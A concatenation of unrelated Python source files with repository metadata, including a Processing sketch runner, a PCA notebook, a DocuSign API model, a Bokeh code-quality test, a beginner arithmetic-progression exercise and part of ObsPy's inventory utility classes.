        sys.exit()

    # The Processing core jars must be on the classpath before importing
    # processing.core below.
    if not load_library('core'):
        sys.exit()

    from processing.core import PApplet  # NOQA

    sys.path.append(settings.COMMAND_ROOT)
    sys.path.insert(0, sketch_info.dirname)

    # Snapshot of the interpreter state, restored after each sketch run so
    # the next import starts clean.
    state_info = state_control.get_state_info()

    gui.create(reload_sketch, exit_sketch)

    import app

    while True:
        # Run the sketch: importing the sketch module executes it.
        print '\n****** START SKETCH ******\n'

        try:
            __import__(sketch_info.modname)
        except Exception as e:
            print e

        # Poll the sketch directory for edits; leave the loop on change,
        # on a GUI reload request, or exit outright on a GUI exit request.
        base_time = watch_update.get_current_time()

        while watch_update.watch_update(
                sketch_info.dirname, '*.py', base_time, settings.WATCH_INTERVAL):
            app.App._update_apps()

            global _to_reload, _to_exit

            if _to_reload:
                _to_reload = False
                break

            if _to_exit:
                # NOTE(review): uses the site builtin exit(); sys.exit()
                # would be the conventional choice -- confirm under Jython.
                exit()

        # Restore the execution environment so the sketch module re-imports
        # fresh on the next loop iteration.
        app.App._dispose_apps()
        state_control.restore_state(state_info)

        import java.lang
        java.lang.System.gc()
# Script entry point (also importable as a module without side effects).
if __name__ == '__main__':
    start()
| 20.323741
| 73
| 0.67115
|
4a01faf0e4ed99a5babd3234ae5e12c9f77fbd5f
| 1,757
|
py
|
Python
|
Principal Components Analysis.py
|
harindi-git1994/PCA
|
242ef2396198bbcd62c2f835d250878c732add33
|
[
"MIT"
] | null | null | null |
Principal Components Analysis.py
|
harindi-git1994/PCA
|
242ef2396198bbcd62c2f835d250878c732add33
|
[
"MIT"
] | null | null | null |
Principal Components Analysis.py
|
harindi-git1994/PCA
|
242ef2396198bbcd62c2f835d250878c732add33
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8

# # PCA (Principal Components Analysis)
# ## wine.csv
# Jupyter-notebook export: standardizes the wine dataset, fits PCA, and
# plots the cumulative explained variance.

# In[16]:
# Importing the libraries used below (pandas/numpy for data handling,
# matplotlib for plotting, scikit-learn for scaling and PCA).
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import sklearn.decomposition as sk
from sklearn.decomposition import PCA
from sklearn.preprocessing import scale

# In[17]:
# Importing the dataset.
# NOTE(review): hard-coded absolute Windows path -- runs only on the
# author's machine; consider a relative path or command-line argument.
wine = pd.read_csv("C:\\Users\\yhari\\OneDrive\\Documents\\1. Data Analyst Training\\CSV files\\wine.csv")

# In[18]:
# Summary statistics of the dataset (displayed by the notebook).
wine.describe()

# In[19]:
# View the top 5 records.
wine.head()

# In[20]:
# Keep only the numerical columns (drops the first column).
# NOTE(review): assigning the attribute ``data`` on a DataFrame does not
# create a column and pandas warns about it -- presumably a plain variable
# (e.g. ``wine_data``) was intended; verify before relying on it.
wine.data = wine.iloc[:,1:]

# In[21]:
wine.data.head()

# In[22]:
# Standardizing (z-score normalizing) the numerical data.
wine_norm = scale(wine.data)

# In[23]:
# Check the type of the result (ndarray, not DataFrame).
type(wine_norm)

# In[24]:
# Convert the ndarray into a DataFrame.
wine1 = pd.DataFrame(wine_norm)

# In[25]:
wine1.head(3)

# In[26]:
# Create PCA models; m1 and m2 are the same projection computed from the
# DataFrame and the raw array respectively.
x = PCA()
m1 = PCA().fit_transform(wine1)
m2 = x.fit_transform(wine_norm)

# In[27]:
# Projected data (displayed by the notebook).
m1

# In[28]:
# The fraction of variance each principal component explains.
var = x.explained_variance_ratio_
var

# In[29]:
# Principal axes (components) of the PCA.
x.components_

# In[30]:
# Convert the components ndarray to a DataFrame of loadings.
wts = pd.DataFrame(x.components_)
wts

# In[31]:
# Cumulative explained variance, as a percentage.
cumvar = np.cumsum(np.round(var, decimals = 4)*100)
cumvar

# In[32]:
newdata = pd.DataFrame(cumvar)

# In[33]:
newdata.head()

# In[34]:
# Convert the m1 model's ndarray to a DataFrame and assign
# it to a new variable called new_wine.
new_wine = pd.DataFrame(m1)
new_wine

# In[35]:
# Scree-style plot of cumulative explained variance per component count.
plt.plot(cumvar, color='red')
plt.show()

# In[ ]:
| 10.845679
| 106
| 0.688674
|
4a01fb27b376230cc60a0ac29406f39855992469
| 6,459
|
py
|
Python
|
docusign_esign/models/workspace_list.py
|
hunk/docusign-python-client
|
a643c42c1236715e74eef6fc279a1b29da1b5455
|
[
"MIT"
] | null | null | null |
docusign_esign/models/workspace_list.py
|
hunk/docusign-python-client
|
a643c42c1236715e74eef6fc279a1b29da1b5455
|
[
"MIT"
] | null | null | null |
docusign_esign/models/workspace_list.py
|
hunk/docusign-python-client
|
a643c42c1236715e74eef6fc279a1b29da1b5455
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
DocuSign REST API
The DocuSign REST API provides you with a powerful, convenient, and simple Web services API for interacting with DocuSign.
OpenAPI spec version: v2.1
Contact: devcenter@docusign.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class WorkspaceList(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, end_position=None, result_set_size=None, start_position=None, total_set_size=None, workspaces=None):
"""
WorkspaceList - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'end_position': 'str',
'result_set_size': 'str',
'start_position': 'str',
'total_set_size': 'str',
'workspaces': 'list[Workspace]'
}
self.attribute_map = {
'end_position': 'endPosition',
'result_set_size': 'resultSetSize',
'start_position': 'startPosition',
'total_set_size': 'totalSetSize',
'workspaces': 'workspaces'
}
self._end_position = end_position
self._result_set_size = result_set_size
self._start_position = start_position
self._total_set_size = total_set_size
self._workspaces = workspaces
    # Each attribute is exposed through a plain getter/setter property pair;
    # the setters perform no validation. Positions and counts are kept as
    # strings, mirroring the 'str' swagger types declared in __init__.

    @property
    def end_position(self):
        """
        Gets the end_position of this WorkspaceList.
        The last position in the result set.

        :return: The end_position of this WorkspaceList.
        :rtype: str
        """
        return self._end_position

    @end_position.setter
    def end_position(self, end_position):
        """
        Sets the end_position of this WorkspaceList.
        The last position in the result set.

        :param end_position: The end_position of this WorkspaceList.
        :type: str
        """
        self._end_position = end_position

    @property
    def result_set_size(self):
        """
        Gets the result_set_size of this WorkspaceList.
        The number of results returned in this response.

        :return: The result_set_size of this WorkspaceList.
        :rtype: str
        """
        return self._result_set_size

    @result_set_size.setter
    def result_set_size(self, result_set_size):
        """
        Sets the result_set_size of this WorkspaceList.
        The number of results returned in this response.

        :param result_set_size: The result_set_size of this WorkspaceList.
        :type: str
        """
        self._result_set_size = result_set_size

    @property
    def start_position(self):
        """
        Gets the start_position of this WorkspaceList.
        Starting position of the current result set.

        :return: The start_position of this WorkspaceList.
        :rtype: str
        """
        return self._start_position

    @start_position.setter
    def start_position(self, start_position):
        """
        Sets the start_position of this WorkspaceList.
        Starting position of the current result set.

        :param start_position: The start_position of this WorkspaceList.
        :type: str
        """
        self._start_position = start_position

    @property
    def total_set_size(self):
        """
        Gets the total_set_size of this WorkspaceList.
        The total number of items available in the result set. This will always be greater than or equal to the value of the property returning the results in the in the response.

        :return: The total_set_size of this WorkspaceList.
        :rtype: str
        """
        return self._total_set_size

    @total_set_size.setter
    def total_set_size(self, total_set_size):
        """
        Sets the total_set_size of this WorkspaceList.
        The total number of items available in the result set. This will always be greater than or equal to the value of the property returning the results in the in the response.

        :param total_set_size: The total_set_size of this WorkspaceList.
        :type: str
        """
        self._total_set_size = total_set_size

    @property
    def workspaces(self):
        """
        Gets the workspaces of this WorkspaceList.
        A list of workspaces.

        :return: The workspaces of this WorkspaceList.
        :rtype: list[Workspace]
        """
        return self._workspaces

    @workspaces.setter
    def workspaces(self, workspaces):
        """
        Sets the workspaces of this WorkspaceList.
        A list of workspaces.

        :param workspaces: The workspaces of this WorkspaceList.
        :type: list[Workspace]
        """
        self._workspaces = workspaces
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 29.493151
| 179
| 0.598699
|
4a01fb375bf0ce681ec450424a4efcc991d75fa8
| 4,974
|
py
|
Python
|
tests/codebase/test_code_quality.py
|
kevin1kevin1k/bokeh
|
9f34b5b710e2748ec803c12918ec1706098a3477
|
[
"BSD-3-Clause"
] | 12
|
2020-07-20T14:58:31.000Z
|
2021-09-04T22:15:14.000Z
|
tests/codebase/test_code_quality.py
|
kevin1kevin1k/bokeh
|
9f34b5b710e2748ec803c12918ec1706098a3477
|
[
"BSD-3-Clause"
] | 1
|
2020-09-05T02:46:20.000Z
|
2020-09-05T02:46:20.000Z
|
tests/codebase/test_code_quality.py
|
kevin1kevin1k/bokeh
|
9f34b5b710e2748ec803c12918ec1706098a3477
|
[
"BSD-3-Clause"
] | 3
|
2019-03-27T23:27:05.000Z
|
2020-08-05T19:03:19.000Z
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2017, Anaconda, Inc. All rights reserved.
#
# Powered by the Bokeh Development Team.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function, unicode_literals
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
import io
from os import pardir
from os.path import split, join, abspath, relpath, basename, splitext
import subprocess
# External imports
# Bokeh imports
#-----------------------------------------------------------------------------
# Tests
#-----------------------------------------------------------------------------
@pytest.mark.codebase
def test_code_quality():
    ''' Applies a collection of general codebase style and quality rules to
    every file in the repository. Unless specifically excepted:

    * Files should not contain tabs
    * Files should not start with newlines
    * Files should end with one empty line
    * Lines should not contain trailing whitespace
    * Lines should not exceed 160 characters

    '''
    # collect_errors() shells out to ``git ls-files`` and scans every
    # tracked file; an empty error list means the codebase is clean.
    errors = collect_errors()
    assert len(errors) == 0, "Code quality issues:\n%s" % "\n".join(errors)
#-----------------------------------------------------------------------------
# Support
#-----------------------------------------------------------------------------
# This is based on sympy's sympy/utilities/tests/test_code_quality.py
# Repository root: two directory levels above this test file.
TOP_PATH = abspath(join(split(__file__)[0], pardir, pardir))
# Limit used by the (currently disabled) line-length check in collect_errors.
MAX_LINE_LENGTH = 160
# Error-message templates; each is later filled with (filename, line number).
message_space = "File contains trailing whitespace: %s, line %s."
message_tabs = "File contains tabs instead of spaces: %s, line %s."
message_carriage = "File contains carriage returns at end of line: %s, line %s"
message_eof = "File does not end with a newline: %s, line %s"
message_multi_bof = "File starts with more than 1 empty line: %s, line %s"
message_multi_eof = "File ends with more than 1 empty line: %s, line %s"
message_too_long = "File contains a line with over %(n)s characters: %%s, line %%s" % dict(n=MAX_LINE_LENGTH)
def tab_in_leading(s):
    """ Return True if the leading whitespace of *s* contains a tab.

    Doctest lines ('>>>' or '...' prompts) are special-cased so that the
    whitespace immediately following the prompt is inspected as well.
    """
    lead = len(s) - len(s.lstrip())
    if s[lead:lead + 3] in ('...', '>>>'):
        after = s[lead + 3:]
        candidate = s[:lead] + after[:len(after) - len(after.lstrip())]
    else:
        candidate = s[:lead]
    return candidate != candidate.expandtabs()
def use_tab_rule(fname):
    """ Whether the no-tabs rule applies to *fname*; Makefiles and Windows
    .bat files legitimately contain tabs and are exempt.
    """
    name = basename(fname)
    return name != 'Makefile' and splitext(fname)[1] != '.bat'
# Repository files exempt from all checks.
exclude_paths = ("CHANGELOG",)
# Binary / vendored file extensions skipped entirely.
# Fix: "otf" was missing its leading dot, so the ``endswith`` test also
# matched any path merely ending in the letters "otf"; it is now ".otf".
exclude_exts = (".patch", ".png", ".jpg", ".pxm", ".ico", ".ics", ".gz", ".gif", ".enc", ".svg", ".xml", ".shp",
                ".dbf", ".shx", ".otf", ".eot", ".ttf", ".woff", ".woff2")
# Directory prefixes skipped entirely.
exclude_dirs = ("sphinx/draw.io",)
def collect_errors():
    """ Scan every git-tracked file (minus the exclusion lists) and return a
    list of formatted style-violation messages.
    """
    # Accumulated as (message_template, filename, line_no) tuples; the
    # nested closure below appends to this shared list.
    errors = []
    def test_this_file(fname, test_file):
        line = None
        for idx, line in enumerate(test_file):
            line_no = idx + 1
            # First line must not be empty.
            if idx == 0 and len(line.strip()) == 0:
                errors.append((message_multi_bof, fname, line_no))
            if line.endswith(" \n") or line.endswith("\t\n"):
                errors.append((message_space, fname, line_no))
            if line.endswith("\r\n") or line.endswith("\r"):
                errors.append((message_carriage, fname, line_no))
            if use_tab_rule(fname) and tab_in_leading(line):
                errors.append((message_tabs, fname, line_no))
            # Line-length check deliberately disabled.
            #if len(line) > MAX_LINE_LENGTH:
            #    errors.append((message_too_long, fname, line_no))
        # After the loop ``line``/``idx`` still hold the last line read;
        # ``line is None`` means the file was empty.
        if line is not None:
            if idx > 0 and len(line.strip()) == 0:
                errors.append((message_multi_eof, fname, line_no))
            if not line.endswith('\n'):
                errors.append((message_eof, fname, line_no))
    # Only files tracked by git are checked.
    paths = subprocess.check_output(["git", "ls-files"]).decode('utf-8').split("\n")
    for path in paths:
        if not path:
            continue
        if path in exclude_paths:
            continue
        if path.endswith(exclude_exts):
            continue
        if path.startswith(exclude_dirs):
            continue
        with io.open(path, 'r', encoding='utf-8') as file:
            test_this_file(path, file)
    # Render each tuple into a human-readable message, path relative to repo.
    return [ msg % (relpath(fname, TOP_PATH), line_no) for (msg, fname, line_no) in errors ]
def bad_files():
    """ Return a space-separated, sorted string of the offending file names
    (deduplicated) — handy for interactive use.
    """
    unique_files = {fname for (_, fname, _) in collect_errors()}
    return " ".join(sorted(unique_files))
| 36.306569
| 112
| 0.528749
|
4a01fb3ffc17fb03a61e383d701cf3ffe896d716
| 537
|
py
|
Python
|
curso em video/python/mundo 2/ex 061.py
|
KenzoDezotti/cursoemvideo
|
6eba03e67192f7384092192ed2cc1a8e59efd9b9
|
[
"MIT"
] | null | null | null |
curso em video/python/mundo 2/ex 061.py
|
KenzoDezotti/cursoemvideo
|
6eba03e67192f7384092192ed2cc1a8e59efd9b9
|
[
"MIT"
] | null | null | null |
curso em video/python/mundo 2/ex 061.py
|
KenzoDezotti/cursoemvideo
|
6eba03e67192f7384092192ed2cc1a8e59efd9b9
|
[
"MIT"
] | null | null | null |
# Prints the terms of an arithmetic progression (P.A.), ten at a time,
# repeatedly asking the user how many more terms to show (0 stops).
x = int(input('digite a razão: '))
w = 10
cont = 0
num1 = int(input('digite um ponto de inico para a P.A. : '))
print('os primeiros numeros da P.A. são: {}'.format(num1), end='-')
while w != 0:
    w -= 1
    cont += 1
    num1 += x
    print(num1, end='-')
    if w == 0:
        # Current batch exhausted: ask for the size of the next one.
        w = int(input('gostaria de ver mais quantos termos? '))
# Fix: the summary used to report ``num1`` (the last TERM of the
# progression) instead of ``cont``, the counter of terms printed in the
# loop.  NOTE(review): ``cont`` excludes the initial term shown before the
# loop — confirm whether it should be ``cont + 1``.
print('a P.A. foi finalizada com {} termos mostrados'.format(cont))
| 28.263158
| 67
| 0.562384
|
4a01fb5cb082f1800253c25517b9ac43808ffc09
| 29,237
|
py
|
Python
|
IRIS_data_download/IRIS_download_support/obspy/core/inventory/util.py
|
earthinversion/Fnet_IRIS_data_automated_download
|
09a6e0c992662feac95744935e038d1c68539fa1
|
[
"MIT"
] | 2
|
2020-03-05T01:03:01.000Z
|
2020-12-17T05:04:07.000Z
|
IRIS_data_download/IRIS_download_support/obspy/core/inventory/util.py
|
earthinversion/Fnet_IRIS_data_automated_download
|
09a6e0c992662feac95744935e038d1c68539fa1
|
[
"MIT"
] | 4
|
2021-03-31T19:25:55.000Z
|
2021-12-13T20:32:46.000Z
|
IRIS_data_download/IRIS_download_support/obspy/core/inventory/util.py
|
earthinversion/Fnet_IRIS_data_automated_download
|
09a6e0c992662feac95744935e038d1c68539fa1
|
[
"MIT"
] | 2
|
2020-09-08T19:33:40.000Z
|
2021-04-05T09:47:50.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Utility objects.
:copyright:
Lion Krischer (krischer@geophysik.uni-muenchen.de), 2013
:license:
GNU Lesser General Public License, Version 3
(https://www.gnu.org/copyleft/lesser.html)
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from future.builtins import * # NOQA
import copy
import re
from collections import Counter
from textwrap import TextWrapper

from obspy import UTCDateTime
from obspy.core.util.base import ComparingObject
from obspy.core.util.obspy_types import (FloatWithUncertaintiesAndUnit,
                                         FloatWithUncertaintiesFixedUnit)
class BaseNode(ComparingObject):
    """
    From the StationXML definition:
        A base node type for derivation of: Network, Station and Channel
        types.

    The parent class for the network, station and channel classes.
    """
    def __init__(self, code, description=None, comments=None, start_date=None,
                 end_date=None, restricted_status=None, alternate_code=None,
                 historical_code=None, data_availability=None):
        """
        :type code: str
        :param code: The SEED network, station, or channel code
        :type description: str, optional
        :param description: A description of the resource
        :type comments: list of :class:`Comment`, optional
        :param comments: An arbitrary number of comments to the resource
        :type start_date: :class:`~obspy.core.utcdatetime.UTCDateTime`,
            optional
        :param start_date: The start date of the resource
        :type end_date: :class:`~obspy.core.utcdatetime.UTCDateTime`, optional
        :param end_date: The end date of the resource
        :type restricted_status: str, optional
        :param restricted_status: The restriction status
        :type alternate_code: str, optional
        :param alternate_code: A code used for display or association,
            alternate to the SEED-compliant code.
        :type historical_code: str, optional
        :param historical_code: A previously used code if different from the
            current code.
        :type data_availability: :class:`~obspy.station.util.DataAvailability`
        :param data_availability: Information about time series availability
            for the network/station/channel.
        """
        # code/alternate_code/historical_code assignments run through the
        # property setters below, which normalize the values.
        self.code = code
        self.comments = comments or []
        self.description = description
        self.start_date = start_date
        self.end_date = end_date
        self.restricted_status = restricted_status
        self.alternate_code = alternate_code
        self.historical_code = historical_code
        self.data_availability = data_availability

    @property
    def code(self):
        # Mandatory SEED code of this node (always a stripped string).
        return self._code

    @code.setter
    def code(self, value):
        # A code is mandatory; surrounding whitespace is never significant.
        if value is None:
            msg = "A code is required"
            raise ValueError(msg)
        self._code = str(value).strip()

    @property
    def alternate_code(self):
        """
        From the StationXML definition:
            A code used for display or association, alternate to the
            SEED-compliant code.
        """
        return self._alternate_code

    @alternate_code.setter
    def alternate_code(self, value):
        # Falsy values (None, "") collapse to None, meaning "not set".
        if value:
            self._alternate_code = value.strip()
        else:
            self._alternate_code = None

    @property
    def historical_code(self):
        """
        From the StationXML definition:
            A previously used code if different from the current code.
        """
        return self._historical_code

    @historical_code.setter
    def historical_code(self, value):
        # Falsy values (None, "") collapse to None, meaning "not set".
        if value:
            self._historical_code = value.strip()
        else:
            self._historical_code = None

    def copy(self):
        """
        Returns a deepcopy of the object.

        :rtype: same class as original object
        :return: Copy of current object.

        .. rubric:: Examples

        1. Create a station object and copy it

            >>> from obspy import read_inventory
            >>> sta = read_inventory()[0][0]
            >>> sta2 = sta.copy()

           The two objects are not the same:

            >>> sta is sta2
            False

           But they have equal data (before applying further processing):

            >>> sta == sta2
            True

        2. The following example shows how to make an alias but not copy the
           data. Any changes on ``st3`` would also change the contents of
           ``st``.

            >>> sta3 = sta
            >>> sta is sta3
            True
            >>> sta == sta3
            True
        """
        return copy.deepcopy(self)

    def is_active(self, time=None, starttime=None, endtime=None):
        """
        Checks if the item was active at some given point in time (`time`)
        and/or if it was active at some point during a certain time range
        (`starttime`, `endtime`).

        .. note::
            If none of the time constraints is specified the result will always
            be `True`.

        :type time: :class:`~obspy.core.utcdatetime.UTCDateTime`
        :param time: Only include networks/stations/channels active at given
            point in time.
        :type starttime: :class:`~obspy.core.utcdatetime.UTCDateTime`
        :param starttime: Only include networks/stations/channels active at or
            after given point in time (i.e. channels ending before given time
            will not be shown).
        :type endtime: :class:`~obspy.core.utcdatetime.UTCDateTime`
        :param endtime: Only include networks/stations/channels active before
            or at given point in time (i.e. channels starting after given time
            will not be shown).
        :rtype: bool
        :returns: `True`/`False` depending on whether the item matches the
            specified time criteria.
        """
        # Point-in-time check: the instant must fall inside the node's
        # start/end dates (missing dates impose no constraint).
        if time is not None:
            if self.start_date is not None and time < self.start_date:
                return False
            if self.end_date is not None and time > self.end_date:
                return False
        # Range check: the node's lifetime must overlap [starttime, endtime].
        if starttime is not None and self.end_date is not None:
            if starttime > self.end_date:
                return False
        if endtime is not None and self.start_date is not None:
            if endtime < self.start_date:
                return False
        return True
class DataAvailability(ComparingObject):
    """
    A description of time series data availability. This information should
    be considered transient and is primarily useful as a guide for
    generating time series data requests. The information for a
    DataAvailability (time) span may be specific to the time range used in a
    request that resulted in the document or limited to the availability of
    data within the request range. These details may or may not be
    retained when synchronizing metadata between data centers.
    """
    def __init__(self, start, end):
        # Coerce both span boundaries to UTCDateTime.
        self.start = UTCDateTime(start)
        self.end = UTCDateTime(end)

    def __str__(self):
        return "Data Availability from {} to {}.".format(str(self.start),
                                                         str(self.end))

    def _repr_pretty_(self, p, cycle):
        p.text(str(self))
class Equipment(ComparingObject):
    """
    An object containing a detailed description of an equipment.
    """
    def __init__(self, type=None, description=None, manufacturer=None,
                 vendor=None, model=None, serial_number=None,
                 installation_date=None, removal_date=None,
                 calibration_dates=None, resource_id=None):
        """
        :type type: str
        :param type: The equipment type
        :type description: str
        :param description: Description of the equipment
        :type manufacturer: str
        :param manufacturer: The manufacturer of the equipment
        :type vendor: str
        :param vendor: The vendor of the equipment
        :type model: str
        :param model: The model of the equipment
        :type serial_number: str
        :param serial_number: The serial number of the equipment
        :type installation_date: :class:`~obspy.core.utcdatetime.UTCDateTime`
        :param installation_date: The installation date of the equipment
        :type removal_date: :class:`~obspy.core.utcdatetime.UTCDateTime`
        :param removal_date: The removal data of the equipment
        :type calibration_dates: list of
            :class:`~obspy.core.utcdatetime.UTCDateTime`
        :param calibration_dates: A list with all calibration dates of the
            equipment.
        :type resource_id: str
        :param resource_id: This field contains a string that should serve as a
            unique resource identifier. This identifier can be interpreted
            differently depending on the data center/software that generated
            the document. Also, we recommend to use something like
            GENERATOR:Meaningful ID. As a common behavior equipment with the
            same ID should contain the same information/be derived from the
            same base instruments.
        """
        self.type = type
        self.description = description
        self.manufacturer = manufacturer
        self.vendor = vendor
        self.model = model
        self.serial_number = serial_number
        # Date assignments go through the property setters below which
        # coerce values to UTCDateTime.
        self.installation_date = installation_date
        self.removal_date = removal_date
        self.calibration_dates = calibration_dates or []
        self.resource_id = resource_id

    @property
    def installation_date(self):
        return self._installation_date

    @installation_date.setter
    def installation_date(self, value):
        # Accept None / UTCDateTime unchanged; coerce everything else.
        if value is None or isinstance(value, UTCDateTime):
            self._installation_date = value
            return
        self._installation_date = UTCDateTime(value)

    @property
    def removal_date(self):
        return self._removal_date

    @removal_date.setter
    def removal_date(self, value):
        # Accept None / UTCDateTime unchanged; coerce everything else.
        if value is None or isinstance(value, UTCDateTime):
            self._removal_date = value
            return
        self._removal_date = UTCDateTime(value)

    def __str__(self):
        ret = ("Equipment:\n"
               "\tType: {type}\n"
               "\tDescription: {description}\n"
               "\tManufacturer: {manufacturer}\n"
               "\tVendor: {vendor}\n"
               "\tModel: {model}\n"
               "\tSerial number: {serial_number}\n"
               "\tInstallation date: {installation_date}\n"
               "\tRemoval date: {removal_date}\n"
               "\tResource id: {resource_id}\n"
               "\tCalibration Dates:\n")
        for calib_date in self.calibration_dates:
            ret += "\t\t%s\n" % calib_date
        # Fix: the old ``ret.format(**self.__dict__)`` raised KeyError --
        # the dates are stored under ``_installation_date``/``_removal_date``
        # (property-backed), not under the placeholder names used in the
        # template.  Pass all values explicitly instead.
        ret = ret.format(
            type=self.type, description=self.description,
            manufacturer=self.manufacturer, vendor=self.vendor,
            model=self.model, serial_number=self.serial_number,
            installation_date=self.installation_date,
            removal_date=self.removal_date, resource_id=self.resource_id)
        return ret

    def _repr_pretty_(self, p, cycle):
        p.text(str(self))
class Operator(ComparingObject):
    """
    An operating agency and associated contact persons. If there are multiple
    operators, each one should be encapsulated within an Operator object. Since
    the Contact element is a generic type that represents any contact person,
    it also has its own optional Agency element.
    """
    def __init__(self, agencies, contacts=None, website=None):
        """
        :type agencies: list of str
        :param agencies: The agencies of the operator (at least one).
        :type contacts: list of :class:`Person`, optional
        :param contacts: One or more contact persons.
        :type website: str, optional
        :param website: The website.
        """
        self.agencies = agencies
        self.contacts = contacts or []
        self.website = website

    @property
    def agencies(self):
        return self._agencies

    @agencies.setter
    def agencies(self, value):
        # Must be a non-empty iterable.
        if not hasattr(value, "__iter__") or len(value) < 1:
            raise ValueError("agencies needs to be iterable, e.g. a list, "
                             "and contain at least one entry.")
        self._agencies = value

    @property
    def contacts(self):
        return self._contacts

    @contacts.setter
    def contacts(self, value):
        if not hasattr(value, "__iter__"):
            raise ValueError("contacts needs to be iterable, e.g. a list.")
        self._contacts = value
class Person(ComparingObject):
    """
    From the StationXML definition:
        Representation of a person's contact information. A person can belong
        to multiple agencies and have multiple email addresses and phone
        numbers.
    """
    # Loose sanity-check pattern applied to every email address.
    email_pattern = re.compile(r"[\w\.\-_]+@[\w\.\-_]+")

    def __init__(self, names=None, agencies=None, emails=None, phones=None):
        """
        :type names: list of str, optional
        :param names: Self-explanatory. Multiple names allowed.
        :type agencies: list of str, optional
        :param agencies: Self-explanatory. Multiple agencies allowed.
        :type emails: list of str, optional
        :param emails: Self-explanatory. Multiple emails allowed.
        :type phones: list of :class:`PhoneNumber`, optional
        :param phones: Self-explanatory. Multiple phone numbers allowed.
        """
        self.names = names or []
        self.agencies = agencies or []
        self.emails = emails or []
        self.phones = phones or []

    @property
    def names(self):
        return self._names

    @names.setter
    def names(self, value):
        if not hasattr(value, "__iter__"):
            raise ValueError("names needs to be iterable, e.g. a list.")
        self._names = value

    @property
    def agencies(self):
        return self._agencies

    @agencies.setter
    def agencies(self, value):
        if not hasattr(value, "__iter__"):
            raise ValueError("agencies needs to be iterable, e.g. a list.")
        self._agencies = value

    @property
    def emails(self):
        return self._emails

    @emails.setter
    def emails(self, values):
        if not hasattr(values, "__iter__"):
            raise ValueError("emails needs to be iterable, e.g. a list.")
        for value in values:
            # Every address must look like "local@domain".
            if re.match(self.email_pattern, value) is None:
                raise ValueError("emails needs to match the pattern "
                                 r"'[\w\.\-_]+@[\w\.\-_]+'")
        self._emails = values

    @property
    def phones(self):
        return self._phones

    @phones.setter
    def phones(self, values):
        if not hasattr(values, "__iter__"):
            raise ValueError("phones needs to be iterable, e.g. a list.")
        self._phones = values
class PhoneNumber(ComparingObject):
    """
    A simple object representing a phone number.
    """
    # Required shape of the number part, e.g. "1234-5678".
    phone_pattern = re.compile("^[0-9]+-[0-9]+$")

    def __init__(self, area_code, phone_number, country_code=None,
                 description=None):
        """
        :type area_code: int
        :param area_code: The area code.
        :type phone_number: str
        :param phone_number: The phone number minus the country and area code.
            Must be in the form "[0-9]+-[0-9]+", e.g. 1234-5678.
        :type country_code: int, optional
        :param country_code: The country code.
        :type description: str, optional
        :param description: Any additional information.
        """
        self.country_code = country_code
        self.area_code = area_code
        self.phone_number = phone_number
        self.description = description

    @property
    def phone_number(self):
        return self._phone_number

    @phone_number.setter
    def phone_number(self, value):
        if re.match(self.phone_pattern, value) is None:
            raise ValueError(
                "phone_number needs to match the pattern '[0-9]+-[0-9]+'")
        self._phone_number = value
class ExternalReference(ComparingObject):
    """
    From the StationXML definition:
        This type contains a URI and description for external data that users
        may want to reference in StationXML.
    """
    def __init__(self, uri, description):
        """
        :type uri: str
        :param uri: The URI to the external data.
        :type description: str
        :param description: A description of the external data.
        """
        self.description = description
        self.uri = uri
class Comment(ComparingObject):
    """
    From the StationXML definition:
        Container for a comment or log entry. Corresponds to SEED blockettes
        31, 51 and 59.
    """
    def __init__(self, value, id=None, begin_effective_time=None,
                 end_effective_time=None, authors=None):
        """
        :type value: str
        :param value: The actual comment string
        :type id: int
        :param id: ID of comment, must be 0 or greater.
        :type begin_effective_time:
            :class:`~obspy.core.utcdatetime.UTCDateTime`, optional
        :param begin_effective_time: The effective start date.
        :type end_effective_time:
            :class:`~obspy.core.utcdatetime.UTCDateTime`, optional
        :param end_effective_time: The effective end date.
        :type authors: list of :class:`Person`, optional
        :param authors: The authors of this comment.
        """
        # All assignments run through the validating property setters below.
        self.value = value
        self.begin_effective_time = begin_effective_time
        self.end_effective_time = end_effective_time
        self.authors = authors or []
        self.id = id

    @property
    def id(self):
        return self._id

    @id.setter
    def id(self, value):
        # None is allowed and means "no ID assigned".
        if value is None:
            self._id = value
            return
        if not int(value) >= 0:
            msg = "ID must be 0 or positive integer."
            raise ValueError(msg)
        self._id = value

    @property
    def value(self):
        return self._value

    @value.setter
    def value(self, value):
        # Comments are always stored as plain strings.
        self._value = str(value)

    @property
    def begin_effective_time(self):
        return self._begin_effective_time

    @begin_effective_time.setter
    def begin_effective_time(self, value):
        # None passes through; anything else is coerced to UTCDateTime.
        if value is None:
            self._begin_effective_time = None
            return
        self._begin_effective_time = UTCDateTime(value)

    @property
    def end_effective_time(self):
        return self._end_effective_time

    @end_effective_time.setter
    def end_effective_time(self, value):
        # None passes through; anything else is coerced to UTCDateTime.
        if value is None:
            self._end_effective_time = None
            return
        self._end_effective_time = UTCDateTime(value)

    @property
    def authors(self):
